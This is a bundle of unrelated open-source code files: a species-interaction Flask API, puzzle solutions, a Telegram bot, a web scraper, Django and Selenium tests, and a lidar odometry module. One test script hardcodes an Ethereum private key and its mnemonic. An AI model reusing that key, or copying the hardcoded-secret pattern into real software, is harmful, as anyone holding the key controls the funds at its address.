{\"observed\": repository.get_interactions(taxon_id, relation, is_subject)}\n\n predicted_dict = {\"predicted\": []}\n return {**queried_dict, **observed_dict, **predicted_dict}\n\n # 1035290 (pilicornis) preys on 1036203 (properans)\n\n\n@app.route(\"/predatedBy/\")\n@app.route(\"/predatedBy\")\ndef predated_by(taxon_id=None):\n if taxon_id is None:\n species_name = request.json[\"species\"]\n if species_name is None:\n return \"\"\n try:\n taxon_id = int(species_name)\n except ValueError:\n taxon_id = repository.get_taxon_id_from_sci_name(species_name)\n relation = \"preysOn\"\n is_subject = True\n\n queried_dict = {\"input\": repository.get_input_taxonomy(taxon_id)}\n observed_dict = {\"observed\": repository.get_interactions(taxon_id, relation, is_subject)}\n\n predicted_dict = {\"predicted\": []}\n return {**queried_dict, **observed_dict, **predicted_dict}\n\n\n@app.route(\"/parasitizes/\")\n@app.route(\"/parasitizes\")\ndef parasitizes(taxon_id=None):\n if taxon_id is None:\n species_name = request.json[\"species\"]\n if species_name is None:\n return \"\"\n try:\n taxon_id = int(species_name)\n except ValueError:\n taxon_id = repository.get_taxon_id_from_sci_name(species_name)\n if species_name is None:\n return \"\"\n\n relation = \"parasiteOf\"\n is_subject = False\n\n queried_dict = {\"input\": repository.get_input_taxonomy(taxon_id)}\n observed_dict = {\"observed\": repository.get_interactions(taxon_id, relation, is_subject)}\n\n predicted_dict = {\"predicted\": []}\n return {**queried_dict, **observed_dict, **predicted_dict}\n\n # 1007770 (membranacea) parasiteOf 5422328 (pyrifera)\n\n\n@app.route(\"/parasitizedBy/\")\n@app.route(\"/parasitizedBy\")\ndef hosts(taxon_id=None):\n if taxon_id is None:\n species_name = request.json[\"species\"]\n if species_name is None:\n return \"\"\n try:\n taxon_id = int(species_name)\n except ValueError:\n taxon_id = repository.get_taxon_id_from_sci_name(species_name)\n if species_name is None:\n return \"\"\n relation = \"parasiteOf\"\n is_subject = True\n\n queried_dict = {\"input\": repository.get_input_taxonomy(taxon_id)}\n observed_dict = {\"observed\": repository.get_interactions(taxon_id, relation, is_subject)}\n\n predicted_dict = {\"predicted\": []}\n return {**queried_dict, **observed_dict, **predicted_dict}\n\n # 1007770 (membranacea) parasiteOf 5422328 (pyrifera)\n\n\n@app.route(\"/predict\", methods=[\"GET\", \"POST\"])\ndef predict():\n request_data = request.get_json()\n relation = request_data['relation']\n is_subject = request_data['is_subject']\n taxon_id = request_data['taxon_id']\n check = request_data['check']\n confidence = request_data[\"confidence\"]\n strict = False\n\n queried_dict = {\"input\": repository.get_input_taxonomy(taxon_id)}\n\n predicted_dict = {\"predicted\": predictions.controller(relation, taxon_id, is_subject, confidence, strict, check)}\n\n return {**queried_dict, **predicted_dict}\n\n\n@app.route(\"/interactions\", methods=[\"GET\"])\ndef interactions():\n interactions_list = {\n \"pollinates\": [\n ['pollinatorOf', 'Pollinators of'],\n ['pollinatedBy', 'Pollinated by']\n ],\n \"preysOn\": [\n ['predatorOf', 'Predators of'],\n ['predatedBy', 'Predated by']\n ],\n \"parasiteOf\": [\n ['parasitizes', 'Parasites of'],\n ['parasitizedBy', 'Parasitized by']\n ]\n }\n\n return {\"Interactions\": interactions_list}\n\n\ndef check_args(confidence):\n if type(confidence) != float or confidence > 1 or confidence < 0:\n return False\n return 
True\n\n","repo_name":"DiSSCo/BiCIKL_Linkages_API","sub_path":"flask_app/api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36088083080","text":"#\n# @lc app=leetcode.cn id=18 lang=python3\n#\n# [18] 四数之和\n#\nimport bisect\nfrom typing import List\n# @lc code=start\n\n\nclass Solution:\n def __init__(self):\n self.result = []\n\n def classic_double_index(self, nums: List[int], target: int) -> List[List[int]]:\n nums.sort()\n if len(nums) < 4:\n return []\n \"\"\"双指针\"\"\"\n for k, v in enumerate(nums[:-3]):\n # 当数组最小值和都大于target 跳出\n if v*4 > target:\n break\n # 当数组最大值和都小于target或者已经遍历过,遍历下一个\n if v + 3*nums[-1] < target or (v == nums[k-1] and k > 0):\n continue\n for _k, _v in enumerate(nums[k+1:-2], k+1):\n # 同理\n if v + _v*3 > target:\n break\n if v + _v + nums[-1]*2 < target or (_v == nums[_k-1] and _k > k+1):\n continue\n R = len(nums)-1\n L = max(_k + 1, bisect.bisect_left(nums, target-nums[R] - _v - v, _k + 1, R) - 1)\n while L < R:\n _sum = v+_v+nums[L]+nums[R]\n if _sum == target:\n self.result.append(\n tuple(sorted((v, _v, nums[L], nums[R]))))\n L = bisect.bisect_right(nums, nums[L], L, R)\n R = bisect.bisect_left(nums, nums[R], L, R)-1\n else:\n L, R = L+(_sum < target), R-(_sum > target)\n return [list(_) for _ in set(self.result)]\n\n def brute_for(self, nums: List[int], target: int) -> List[List[int]]:\n nums.sort()\n if len(nums) < 4:\n return []\n counter = {}\n for n in nums:\n counter[n] = counter.get(n, 0)+1\n \"\"\"双指针\"\"\"\n for k, v in enumerate(nums[:-3]):\n # 当数组最小值和都大于target 跳出\n if v*4 > target:\n break\n # 当数组最大值和都小于target或者已经遍历过,遍历下一个\n if v + 3*nums[-1] < target or (v == nums[k-1] and k > 0):\n continue\n counter[v] -= 1\n for _k, _v in enumerate(nums[k+1:-2], k+1):\n # 同理\n if v + _v*3 > target:\n break\n if v + _v + nums[-1]*2 < target or (_v == nums[_k-1] and _k > k+1):\n continue\n counter[_v] -= 1\n for __k in range(_k if counter[_v] > 0 else _k+1, len(nums)):\n c = nums[__k]\n d = target-v-_v-c\n if c > d:\n break\n if d not in counter or c == d and counter[c] < 2:\n continue\n self.result.append((v, _v, c, d))\n counter[_v] += 1\n return [list(_) for _ in set(self.result)]\n\n def fourSum(self, nums: List[int], target: int) -> List[List[int]]:\n return {\n 1: lambda nums, target: self.classic_double_index(nums, target),\n 2: lambda nums, target: self.brute_for(nums, target),\n }[2](nums, target)\n\n\n# @lc code=end\nif __name__ == \"__main__\":\n test = Solution()\n print(test.fourSum([0, 0, 0, 0], 0))\n","repo_name":"StrayCamel247/Leetcode","sub_path":"questions/18.四数之和.py","file_name":"18.四数之和.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"27"} +{"seq_id":"36724706446","text":"from os import write\nimport subprocess\nimport OMMCOLLECTION\nimport OMM\nimport flatbuffers\nfrom web3.auto import w3\nfrom eth_account.messages import encode_defunct\nfrom eth_account import Account\n\n\ndef calculate_cid(file_path):\n cmd = ['ipfs', 'add', '-n', file_path]\n output = subprocess.run(cmd, capture_output=True)\n cid = output.stdout.decode().strip().split(\" \")[1]\n return cid\n\n\nprovider_eth_address = \"0x9858EfFD232B4033E47d90003D41EC34EcaEda94\"\nfb_cid = \"QmepW1hutjHdrPMhWBJCyinz8bfjtJ3WKsspb5vvcD6DTz\"\npdFP = f\"data/{provider_eth_address}/{fb_cid}.OMM.fbs\"\n\n# Load OMMCOLLECTION from file\nwith open(pdFP, \"rb\") as f:\n xOMM = 
f.read()\n\n# Load the signature from a text file\nwith open(pdFP+\".sig\", \"r\") as f:\n signature = f.read()\n\nmessage = encode_defunct(text=fb_cid)\nstuff = w3.eth.account.recover_message(\n message, signature=signature)\n\nprint(\"Valid Digital Signature: \", stuff == provider_eth_address)\n\nyOMMCOLLECTION = OMMCOLLECTION.OMMCOLLECTION.GetRootAsOMMCOLLECTION(xOMM)\n\nfor yOMM in range(yOMMCOLLECTION.RECORDSLength()):\n yOMMRECORD = yOMMCOLLECTION.RECORDS(yOMM)\n # print(yOMMRECORD.NORAD_CAT_ID())\n\n# create OMM object\nommt = OMM.OMMT()\n\n# set OMM object properties\nommt.NORAD_CAT_ID = 25544\nommt.OBJECT_NAME = \"ISS (ZARYA)\"\nommt.OBJECT_ID = \"1998-067A\"\nommt.EPOCH = \"2023-01-03T12:36:01.932768\"\nommt.MEAN_MOTION = 15.49892242\nommt.ECCENTRICITY = 0.0005004\nommt.INCLINATION = 51.6453\nommt.RA_OF_ASC_NODE = 64.1711\nommt.ARG_OF_PERICENTER = 218.5032\nommt.MEAN_ANOMALY = 238.7671\nommt.EPHEMERIS_TYPE = 0\nommt.CLASSIFICATION_TYPE = \"U\"\nommt.ELEMENT_SET_NO = 999\nommt.REV_AT_EPOCH = 37625\nommt.BSTAR = 0.00030219\nommt.MEAN_MOTION_DOT = 0.00016767\nommt.MEAN_MOTION_DDOT = 0\n\n# create builder and pack OMM properties\nbuilder = flatbuffers.Builder()\nbuilder.Finish(ommt.Pack(builder))\niss_buf = builder.Output()\n\n# create OMMCOLLECTION and add OMM to the RECORDS list\nommc = OMMCOLLECTION.OMMCOLLECTIONT()\nommc.RECORDS = list()\nommc.RECORDS.append(ommt)\nbuilder.Finish(ommc.Pack(builder))\nommc_buf = builder.Output()\n\n# added OMM check\nprint(\"Added OMM has the same NORAD_CAT_ID: \",\n ommt.NORAD_CAT_ID == ommc.RECORDS[0].NORAD_CAT_ID)\n\niss = OMM.OMM.GetRootAs(iss_buf, 0)\nprint(\"CREATED OMM FOR ISS\", iss.NORAD_CAT_ID())\n\nommc = OMMCOLLECTION.OMMCOLLECTION.GetRootAs(ommc_buf, 0)\nprint(\"CREATED OMMCOLLECTION, ADDED ISS\", ommc.RECORDS(0).NORAD_CAT_ID())\nprint(\"\\n\")\n\niss_fp = \"iss.fbs\"\nommc_fp = \"ommc.fbs\"\n\niss_fpf = open(iss_fp, \"wb\")\niss_fpf.write(iss_buf)\niss_fpf.close()\n\nommc_fpf = open(ommc_fp, \"wb\")\nommc_fpf.write(ommc_buf)\nommc_fpf.close()\n\nprint(f\"Original CID Match ({fb_cid[:7]}...{fb_cid[41:]}): \", fb_cid == calculate_cid(pdFP))\n\niss_cid = calculate_cid(iss_fp)\nprint(\"ISS CID: \", iss_cid)\nommc_cid = calculate_cid(ommc_fp)\nprint(\"OMMC CID: \", ommc_cid)\nprint(\"\\n\")\n# `excess shallow future wheat amazing fee rug hammer hire crazy lumber mean`\nkey = \"0x1ab42cc412b618bdea3a599e3c9bae199ebf030895b039e9db1e30dafb12b727\"\n\nsigned_original = Account.sign_message(encode_defunct(text=fb_cid), key)\nprint(f\"Original SIG Match ({signature[:7]}...{signature[127:]}): \", signature == signed_original.signature.hex())\nsigned_iss_cid = Account.sign_message(encode_defunct(text=iss_cid), key)\nprint(\"SIGNED ISS CID: \", signed_iss_cid.signature.hex())\nsigned_omm_cid = Account.sign_message(encode_defunct(text=ommc_cid), key)\nprint(\"SIGNED OMMC CID: \", signed_omm_cid.signature.hex())\n","repo_name":"DigitalArsenal/OMM_PYTHON_TEST","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"17534819417","text":"\"\"\"Advent of code Day 8 part 2\"\"\"\n\n\ndef main():\n \"\"\"Main function\"\"\"\n with open('input.txt') as f:\n file_lines = f.read().split('\\n')\n\n code_len = sum(len(i) for i in file_lines)\n encoded_lines = [i.encode('unicode_escape').decode() for i in file_lines]\n # Encode quotemark characters\n for i, line in enumerate(encoded_lines):\n if '\"' in line:\n 
encoded_lines[i] = '\"' + line.replace(r'\"', r'\\\"') + '\"'\n\n encoded_len = sum(len(i) for i in encoded_lines)\n\n print(f'Encoded: {encoded_len}')\n print(f'Code: {code_len}')\n print(f'Answer: {encoded_len - code_len}')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"michaelotty/aoc2015","sub_path":"08/aoc201508p2.py","file_name":"aoc201508p2.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"4962660482","text":"def divisors(num):\n try:\n if num < 0:\n raise ValueError(\"Solo se adminten Numeros positivos\")\n\n divisors = []\n for i in range(1, num +1):\n if num % i == 0:\n divisors.append(i)\n return divisors\n except ValueError as ve:\n return ve\n\ndef run():\n try:\n num = int(input('Ingresa un numero: '))\n print(divisors(num))\n print(\"Termino el programa\")\n except ValueError as ve:\n print(\"Solo se adminten Numeros\")\n\nif __name__ == '__main__':\n run()","repo_name":"oscargbocanegra/platzi","sub_path":"python/curso_intermedio_python/debugging.py","file_name":"debugging.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"43481332693","text":"from rest_framework import serializers\nfrom .models import Movie\nfrom genres.serializers import GenreSerializer\nfrom genres.models import Genre\n\n\nclass MovieSerializer(serializers.ModelSerializer):\n genres = GenreSerializer(many=True)\n\n class Meta:\n model = Movie\n fields = [\n \"id\",\n \"title\",\n \"duration\",\n \"premiere\",\n \"budget\",\n \"overview\",\n \"genres\",\n ]\n\n def create(self, validated_data: dict) -> Movie:\n genres_list = validated_data.pop(\"genres\")\n movie_obj = Movie.objects.create(**validated_data)\n\n for genre_dict in genres_list:\n genreFound = Genre.objects.filter(name__iexact=genre_dict[\"name\"]).first()\n\n if not genreFound:\n genreFound = Genre.objects.create(**genre_dict)\n\n movie_obj.genres.add(genreFound)\n\n return movie_obj\n","repo_name":"MatheusMoura-M/kmdb","sub_path":"movies/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"6346757024","text":"import imp\r\nfrom flask import Flask,request,jsonify\r\nfrom flask_cors import CORS\r\n\r\napp = Flask(__name__)\r\nCORS(app)\r\n\r\n@app.route(\"/api/discountCalculator/\",methods=['GET'])\r\ndef GetNewAmount(amount):\r\n amount = float(amount)\r\n if(amount >= 10000):\r\n amount*=0.88\r\n elif(amount>=5000):\r\n amount*=0.92\r\n elif(amount >= 3000):\r\n amount*=0.97;\r\n return jsonify({\"TotalAmount\": str(amount)})\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True,\r\n host='localhost',\r\n port=8000)","repo_name":"TonnyWong1052/ITP4523M-Internet-and-Multimedia-Applications-Development","sub_path":"PHP project/pythonApi/RESTful.py","file_name":"RESTful.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42056248887","text":"import json\nimport os\nimport requests\nimport time\nfrom os.path import join, dirname\nfrom dotenv import load_dotenv\nfrom src.extractor.scrape import AbstractScraper\n\ndotenv_path = join(dirname(__file__), '.env')\nload_dotenv(dotenv_path)\n\n\nclass Scrape_aliexpress(AbstractScraper):\n def __init__(self):\n self.short_url = 
'www.aliexpress.com'\n self._product_api = {}\n\n def _get_data(self, *args):\n global time_start\n time_start = time.time()\n api_source = \"https://magic-aliexpress1.p.rapidapi.com/api/products/search\"\n\n querystring = {\"name\": self.item, \"page\": \"1\"}\n\n headers = {\n 'x-rapidapi-key': os.environ.get(\"X_RAPIDAPI_KEY\"),\n 'x-rapidapi-host': os.environ.get(\"X_RAPIDAPI_HOST_500_MO\")\n }\n\n response = requests.request(\"GET\", api_source, headers=headers, params=querystring)\n\n # with open(\"json_responses.txt\", \"a\") as json_file:\n # json_file.write(str(response.text))\n # json_file.write('\\nNew request\\n')\n\n return json.loads(str(response.text))\n\n def _extract_data(self, response):\n item_list = response['docs']\n api = {'data': []}\n\n rating_over = '5'\n\n for item in item_list:\n title = item['product_title']\n price_value = item['app_sale_price']\n price_curr = item['app_sale_price_currency']\n base_url = item['product_detail_url']\n\n try:\n shipping = item['metadata']['logistics']['logisticsDesc']\n rating_val = item['evaluate_rate']\n rating = str(rating_val) + '/5'\n except (KeyError, TypeError):\n # some items lack logistics/rating metadata\n shipping = None\n rating_val = 0\n rating = None\n\n api['data'].append(\n self._construct_api(title=title, price_value=price_value, price_curr=price_curr, base_url=base_url,\n rating_val=rating_val, rating_over=rating_over, rating=rating, shipping=shipping,\n short_url=self.short_url))\n time_end = time.time()\n self._update_details(api, time_start=time_start, time_end=time_end)\n\n return api\n\n def _get_api(self):\n json_data = self._get_data()\n return self._extract_data(json_data)\n\n def __call__(self, **kwargs):\n self.item = kwargs['item']\n self._product_api = self._get_api()\n\n return self._product_api\n","repo_name":"odorT/iBuy","sub_path":"src/extractor/scrape_aliexpress.py","file_name":"scrape_aliexpress.py","file_ext":"py","file_size_in_byte":2458,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"27"} +{"seq_id":"7269860113","text":"nilai = [{'nim' : 'A01', 'nama' : 'Agustina', 'mid' : 50, 'uas' : 80},\r\n {'nim' : 'A02', 'nama' : 'Budi', 'mid' : 40, 'uas' : 90}, \r\n {'nim' : 'A03', 'nama' : 'Chicha', 'mid' : 100, 'uas' : 50}, \r\n {'nim' : 'A04', 'nama' : 'Donna', 'mid' : 20, 'uas' : 100},\r\n {'nim' : 'A05', 'nama' : 'Fatimah', 'mid' : 70, 'uas' : 100}]\r\n\r\nprint('='*67)\r\nprint('NIM'.ljust(10), 'NAMA'.ljust(15), 'N.MID'.ljust(10), 'N.UAS'.ljust(10), 'N.AKHIR'.ljust(10), 'STATUS')\r\nprint('-'*67)\r\nfor i in nilai:\r\n na = (i['mid'] +2*i['uas'])/3\r\n membulat = round(na)\r\n if na >= 60:\r\n status = 'LULUS'\r\n if na < 60:\r\n status = 'TIDAK LULUS'\r\n print(i['nim'].ljust(10), i['nama'].ljust(15), str(i['mid']).ljust(10), str(i['uas']).ljust(10), str(membulat).ljust(10), status)\r\nprint('='*67)\r\n","repo_name":"adhidharmawan/Python-Projects-Protek","sub_path":"praktikum 9/nomor 6.py","file_name":"nomor 6.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"sr","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19543660228","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\nfrom .base import FunctionalTest\n\n\nclass NewVisitorTest(FunctionalTest):\n ''' A test from the point of view of a new visitor '''\n\n def test_can_start_a_list_for_one_user(self):\n '''Test: a list can be created and retrieved later'''\n\n # Semyon has heard about a cool online application with\n # a to-do list. 
He decides to check out its home page\n self.browser.get(self.live_server_url)\n\n # He sees that the page title and header mention to-do\n # lists\n self.assertIn('To-Do', self.browser.title)\n header_text = self.browser.find_element_by_tag_name('h1').text\n self.assertIn('To-Do', header_text)\n\n # He is immediately invited to enter a to-do item\n inputbox = self.get_item_input_box()\n self.assertEqual(\n inputbox.get_attribute('placeholder'),\n 'Enter a to-do item'\n )\n\n # He types \"Buy a programming book\" into the text box\n inputbox.send_keys('Buy a programming book')\n\n # When he hits Enter, the page updates, and now the page\n # lists \"1: Buy a programming book\" as a list item\n inputbox.send_keys(Keys.ENTER)\n self.wait_for_row_in_list_table('1: Buy a programming book')\n\n # Now he types \"Buy a graphics card\" into the text box\n # When he hits Enter, the page updates again, and now it\n # shows \"2: Buy a graphics card\"\n inputbox = self.get_item_input_box()\n inputbox.send_keys('Buy a graphics card')\n inputbox.send_keys(Keys.ENTER)\n\n self.wait_for_row_in_list_table('1: Buy a programming book')\n self.wait_for_row_in_list_table('2: Buy a graphics card')\n\n # Semyon finishes for the day and goes to bed\n \n def test_multiple_users_can_start_lists_at_different_urls(self):\n '''Test: multiple users can start lists at different URLs'''\n # Semyon starts a new list\n self.browser.get(self.live_server_url)\n inputbox = self.get_item_input_box()\n inputbox.send_keys('Buy a programming book')\n inputbox.send_keys(Keys.ENTER)\n self.wait_for_row_in_list_table('1: Buy a programming book')\n\n # He notices that his list has a unique URL\n semen_list_url = self.browser.current_url\n self.assertRegex(semen_list_url, '/lists/.+')\n\n # Now a new user, Artyom, comes along to the site\n self.browser.quit()\n self.browser = webdriver.Chrome()\n \n # Artyom visits the home page. 
There is no sign of Semyon's list\n self.browser.get(self.live_server_url)\n page_text = self.browser.find_element_by_tag_name('body').text\n self.assertNotIn('Buy a programming book', page_text)\n\n # Artyom starts a new list by entering a new item\n inputbox = self.get_item_input_box()\n inputbox.send_keys('Buy milk')\n inputbox.send_keys(Keys.ENTER)\n self.wait_for_row_in_list_table('1: Buy milk')\n\n # Artyom gets his own unique URL\n artem_list_url = self.browser.current_url\n self.assertRegex(artem_list_url, '/lists/.+')\n self.assertNotEqual(artem_list_url, semen_list_url)\n\n # Again, there is no trace of Semyon's list\n page_text = self.browser.find_element_by_tag_name('body').text\n self.assertNotIn('Buy a programming book', page_text)\n self.assertIn('Buy milk', page_text)\n\n # Semyon and Artyom both finish working with their lists\n","repo_name":"G000D1ESS/todo-lists-django","sub_path":"functional_tests/test_simple_list_creation.py","file_name":"test_simple_list_creation.py","file_ext":"py","file_size_in_byte":4909,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"17142531341","text":"#!/usr/bin/env python3\n\nimport argparse\nimport pickle\n\nimport torch\n\nfrom torch_model import SentenceEncoder\nfrom WordVector import WordVector\n\nfrom torch_model import evaluate, make_data_loader, create_encoder\n\n\ndef parse_cmdline():\n p = argparse.ArgumentParser()\n p.add_argument('--w2v', required=True)\n p.add_argument('--dataset', required=True)\n p.add_argument('--model', required=True)\n return p.parse_args()\n\n\ndef main():\n cmdline = parse_cmdline()\n\n with open(cmdline.dataset, 'rb') as f:\n dataset = pickle.load(f)\n\n loader = make_data_loader(dataset['test'], False)\n\n word2vec = WordVector()\n word2vec.load_bin(cmdline.w2v)\n encoder = create_encoder(word2vec)\n encoder.load_state_dict(torch.load(cmdline.model))\n\n r = evaluate(loader, encoder, None)\n print(r)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"torshie/learn-tensorflow","sub_path":"qqp/eval_torch_model.py","file_name":"eval_torch_model.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"33657345275","text":"import json\nimport telebot\nimport os\nfrom config import user_message_chain, admin_message_chain, message_to_send_template, subscribe_user_message_chain\nfrom db import collection\n\nbot = telebot.TeleBot(os.getenv('TG_BOT_TOKEN'), parse_mode=None, threaded=False)\n\ndestination_group_id = int(os.getenv('DESTINATION_GROUP_ID'))\nadmin_id = int(os.getenv('ADMIN_ID'))\n\n\n@bot.message_handler(commands=['subscribe'])\ndef subscribe(message):\n add_subscriber(message.chat.id)\n bot.send_message(message.chat.id, text=subscribe_user_message_chain[0])\n\n\n@bot.message_handler(commands=['unsubscribe'])\ndef unsubscribe(message):\n remove_subscriber(message.chat.id)\n bot.send_message(message.chat.id, text=subscribe_user_message_chain[1])\n\n\n@bot.message_handler(commands=['start'])\ndef start(message):\n photo = open('0.jpg', 'rb')\n bot.send_photo(message.chat.id, photo)\n\n 
bot.send_message(message.chat.id, text=user_message_chain[0])\n bot.send_message(message.chat.id, text=user_message_chain[1])\n bot.register_next_step_handler(message, get_name)\n\n\ndef get_name(message):\n name = message.text.strip()\n photo = open('1.jpg', 'rb')\n bot.send_photo(message.from_user.id, photo)\n bot.send_message(message.from_user.id, text=user_message_chain[2].format(name=name))\n bot.register_next_step_handler(message, get_description, name.capitalize())\n\n\ndef get_description(message, name):\n description = message.text.lower().strip()\n bot.send_message(message.from_user.id, text=user_message_chain[3])\n bot.register_next_step_handler(message, get_contact, name, description)\n\n\ndef get_contact(message, name, description):\n contact = message.text.lower().strip()\n send_data(name, description, contact)\n bot.send_message(message.from_user.id, text=user_message_chain[4].format(name=name))\n\n\ndef send_data(name, description, contact):\n bot.send_message(destination_group_id,\n text=user_message_chain[5].format(name=name, description=description, contact=contact))\n\n\n@bot.message_handler(func=lambda message: message.from_user.id == admin_id and\n (message.text.strip().startswith('https://www.youtube')\n or message.text.strip().startswith('https://youtube')\n or message.text.strip().startswith('https://youtu.be')))\ndef send_stream_notification(message):\n link = message.text.lower().strip()\n\n bot.send_message(message.chat.id, text=admin_message_chain[0])\n bot.register_next_step_handler(message, get_stream_name, link)\n\n\ndef get_stream_name(message, link):\n stream_name = message.text.strip()\n result_message_to_send = message_to_send_template.format(name_stream=stream_name, link=link)\n\n bot.send_message(message.chat.id, text=admin_message_chain[1].format(user_count=get_subscribers_count()))\n subscribers = get_subscribers()\n\n for subscriber in subscribers:\n bot.send_message(subscriber['tg_id'], result_message_to_send)\n\n bot.send_message(message.chat.id, text=admin_message_chain[2])\n\n\ndef process_event(event):\n request_body_dict = json.loads(event['body'])\n update = telebot.types.Update.de_json(request_body_dict)\n bot.process_new_updates([update])\n\n\ndef get_subscribers_count():\n return collection.count_documents({})\n\n\ndef get_subscribers():\n return collection.find({})\n\n\ndef add_subscriber(user_id):\n collection.update_one({'tg_id': user_id}, {'$set': {'tg_id': user_id}}, upsert=True)\n\n\ndef remove_subscriber(user_id):\n collection.delete_one({'tg_id': user_id})\n\n\ndef main(event=None, context=None):\n process_event(event)\n return {\n 'statusCode': 200\n }\n","repo_name":"Tsarikovich/yanajoj_bot","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"39815467946","text":"import mrob\nimport numpy as np\nimport open3d as o3d\n\nfrom feature_extractor import FeatureExtractor\nfrom optimizer import LOAMOptimizer\nfrom utils import get_pcd_from_numpy, matrix_dot_product\nimport utils\n'''\n整个代码特征命名方式过于混乱,sharp/edge planer/flat一直在交替使用\n实际上是等价的,需要进行统一\n'''\nclass OdometryEstimator:\n '''\n 可能:DISTANCE_SQ_THRESHOLD的设置对heading 旋转速度较大的情况十分敏感,也就是当绕z轴旋转速度较快时,该阈值可能造成丢失大量\n 可以考虑利用z轴角速度积分来限定距离阈值或其它策略\n '''\n DISTANCE_SQ_THRESHOLD = 1 # kitti_vlp64的0.1fps,1m约束近似10m/s=36km/h(数据采集车速基本<40km/h), 为低速状态下的估计;自适应速度可由acc积分估算替换\n SCAN_VICINITY = 2.5 # VFOV=26.9 可认为是为了适配多线束、垂直分辨率小抖动匹配的; vlp16在适配时,垂直分辨率大不知道是否需要调小\n\n 
def __init__(self):\n self.extractor = FeatureExtractor() # 特征提取器\n\n self.inited = False\n self.last_less_sharp_points = None # 上一帧边特征\n self.last_less_flat_points = None # 上一帧面特征\n self.last_position = np.eye(4) # 位姿矩阵 用于每次初始化配准\n\n def append_pcd(self, pcd):\n # input: 点序列 起点索引 终点索引\n # output: 强边、边、强面、面\n sharp_points, less_sharp_points, flat_points, less_flat_points = self.extractor.extract_features(pcd[0], pcd[1],\n pcd[2])\n T = None\n if not self.inited:\n self.inited = True\n T = np.zeros(6) # 全局初始\n else:\n edge_corresp = self.find_edge_correspondences(sharp_points) # 基于当前帧t中的sharp,在上一帧t-1寻找满足条件的sharp_less\n surface_corresp = self.find_surface_correspondences(flat_points, pcd) # 基于当前帧t中的flap,在上一帧t-1寻找满足条件的flap_less\n optimizer = LOAMOptimizer(edge_corresp, surface_corresp) # 最小二乘 求相邻帧优化信息\n T = optimizer.optimize()\n\n ''' 又对surface进行了一次可视化,这里需要注意的是作者直接在未使用T进行处理的情况下,将 PCD[t], orig[t] 和 keypoints[t-1]\n surf = np.vstack((surface_corresp[1], surface_corresp[2], surface_corresp[3])) # j l m 0=pcd[feature point]\n keypoints = utils.get_pcd_from_numpy(surf)\n keypoints.paint_uniform_color([0, 1, 0])\n pcd = utils.get_pcd_from_numpy(mrob.geometry.SE3(T).transform_array(pcd[0]))\n pcd.paint_uniform_color([0, 0, 1])\n orig = utils.get_pcd_from_numpy(surface_corresp[0]) # t时刻特征,面特征(存在对应参考点)\n orig.paint_uniform_color([1, 0, 0])\n o3d.visualization.draw_geometries([pcd, keypoints, orig])\n '''\n #'''\n # 更新last less edge 和 less planer 特征\n #import time\n #b1=time.time()\n self.last_less_sharp_points = np.vstack(less_sharp_points) # list2array, 直接无排序\n '''\n 由于平面点太多,之前估计单帧都在8w+, 利用open3d进行 体素化降采样,并且通过color保留ring number值\n 需要将[xyz scan_id]拆分--降采样--合并\n '''\n x = get_pcd_from_numpy(np.vstack(less_flat_points)) # 平面点?\n y = np.vstack(less_flat_points)[:, 3].reshape((-1, 1)) # / 64 # 归一化做颜色\n x.colors = o3d.utility.Vector3dVector(np.hstack((y, y, y)))\n x = x.voxel_down_sample(0.1) # 降采样 voxelsize=0.1^3\n scan_ids = np.asarray(x.colors)[:, 0].reshape(-1, 1).astype(np.int16) # (64 * np.asarray(x.colors)[:, 0].reshape(-1, 1)).astype(np.int16)\n self.last_less_flat_points = np.hstack((np.asarray(x.points), scan_ids)) #scan_ids))\n scan_ids = self.last_less_flat_points[:, 3]\n sorted_ind = np.argsort(scan_ids, kind='stable')\n self.last_less_flat_points = self.last_less_flat_points[sorted_ind] # 基于ring number 排序\n # 更新 最后的 T 到 self.last_position\n self.last_position = mrob.geometry.SE3(T).T() @ self.last_position # 更新最后的T\n\n #b2 = time.time()\n '''\n self.last_less_sharp_points = np.vstack(less_sharp_points)\n x = get_pcd_from_numpy(np.vstack(less_flat_points))\n y = np.vstack(less_flat_points)[:, 3].reshape((-1, 1)) / 64\n x.colors = o3d.utility.Vector3dVector(np.hstack((y, y, y)))\n x = x.voxel_down_sample(0.1)\n self.last_less_flat_points = np.hstack((np.asarray(x.points), 64 * np.asarray(x.colors)[:, 0].reshape((-1, 1))))\n scan_ids = self.last_less_flat_points[:, 3]\n sorted_ind = np.argsort(scan_ids, kind='stable')\n self.last_less_flat_points = self.last_less_flat_points[sorted_ind]\n self.last_position = mrob.geometry.SE3(T).T() @ self.last_position\n print(time.time()-b2,b2-b1)\n '''\n return mrob.geometry.SE3(T).T(), self.last_less_flat_points, self.last_less_flat_points\n '''\n 当前帧的 edge特征i 在上一帧的 less_edge找到相关的参考点集\n 